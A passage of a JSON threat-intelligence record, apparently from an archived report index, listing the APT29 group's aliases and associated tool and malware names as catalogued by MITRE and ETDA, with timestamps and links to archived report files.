				"Blue Kitsune",
				"UNC3524",
				"Midnight Blizzard"
			],
			"source_name": "MITRE:APT29",
			"tools": [
				"PinchDuke",
				"ROADTools",
				"WellMail",
				"CozyCar",
				"Mimikatz",
				"Tasklist",
				"OnionDuke",
				"FatDuke",
				"POSHSPY",
				"EnvyScout",
				"SoreFang",
				"GeminiDuke",
				"reGeorg",
				"GoldMax",
				"FoggyWeb",
				"SDelete",
				"PolyglotDuke",
				"AADInternals",
				"MiniDuke",
				"SeaDuke",
				"Sibot",
				"RegDuke",
				"CloudDuke",
				"GoldFinder",
				"AdFind",
				"PsExec",
				"NativeZone",
				"Systeminfo",
				"ipconfig",
				"Impacket",
				"Cobalt Strike",
				"PowerDuke",
				"QUIETEXIT",
				"HAMMERTOSS",
				"BoomBox",
				"CosmicDuke",
				"WellMess",
				"VaporRage",
				"LiteDuke"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "f27790ff-4ee0-40a5-9c84-2b523a9d3270",
			"created_at": "2022-10-25T16:07:23.341684Z",
			"updated_at": "2026-04-10T02:00:04.549917Z",
			"deleted_at": null,
			"main_name": "APT 29",
			"aliases": [
				"APT 29",
				"ATK 7",
				"Blue Dev 5",
				"BlueBravo",
				"Cloaked Ursa",
				"CloudLook",
				"Cozy Bear",
				"Dark Halo",
				"Earth Koshchei",
				"G0016",
				"Grizzly Steppe",
				"Group 100",
				"ITG11",
				"Iron Hemlock",
				"Iron Ritual",
				"Midnight Blizzard",
				"Minidionis",
				"Nobelium",
				"NobleBaron",
				"Operation Ghost",
				"Operation Office monkeys",
				"Operation StellarParticle",
				"SilverFish",
				"Solar Phoenix",
				"SolarStorm",
				"StellarParticle",
				"TEMP.Monkeys",
				"The Dukes",
				"UNC2452",
				"UNC3524",
				"Yttrium"
			],
			"source_name": "ETDA:APT 29",
			"tools": [
				"7-Zip",
				"ATI-Agent",
				"AdFind",
				"Agentemis",
				"AtNow",
				"BEATDROP",
				"BotgenStudios",
				"CEELOADER",
				"Cloud Duke",
				"CloudDuke",
				"CloudLook",
				"Cobalt Strike",
				"CobaltStrike",
				"CosmicDuke",
				"Cozer",
				"CozyBear",
				"CozyCar",
				"CozyDuke",
				"Danfuan",
				"EnvyScout",
				"EuroAPT",
				"FatDuke",
				"FoggyWeb",
				"GeminiDuke",
				"Geppei",
				"GoldFinder",
				"GoldMax",
				"GraphDrop",
				"GraphicalNeutrino",
				"GraphicalProton",
				"HAMMERTOSS",
				"HammerDuke",
				"LOLBAS",
				"LOLBins",
				"LiteDuke",
				"Living off the Land",
				"MagicWeb",
				"Mimikatz",
				"MiniDionis",
				"MiniDuke",
				"NemesisGemina",
				"NetDuke",
				"OnionDuke",
				"POSHSPY",
				"PinchDuke",
				"PolyglotDuke",
				"PowerDuke",
				"QUIETEXIT",
				"ROOTSAW",
				"RegDuke",
				"Rubeus",
				"SNOWYAMBER",
				"SPICYBEAT",
				"SUNSHUTTLE",
				"SeaDaddy",
				"SeaDask",
				"SeaDesk",
				"SeaDuke",
				"Sharp-SMBExec",
				"SharpView",
				"Sibot",
				"Solorigate",
				"SoreFang",
				"TinyBaron",
				"WINELOADER",
				"WellMail",
				"WellMess",
				"cobeacon",
				"elf.wellmess",
				"reGeorg",
				"tDiscoverer"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434625,
	"ts_updated_at": 1775792253,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/fb0c003e4f7cb3413a5303e9e563316f5667bb8e.pdf",
		"text": "https://archive.orkl.eu/fb0c003e4f7cb3413a5303e9e563316f5667bb8e.txt",
		"img": "https://archive.orkl.eu/fb0c003e4f7cb3413a5303e9e563316f5667bb8e.jpg"
	}
}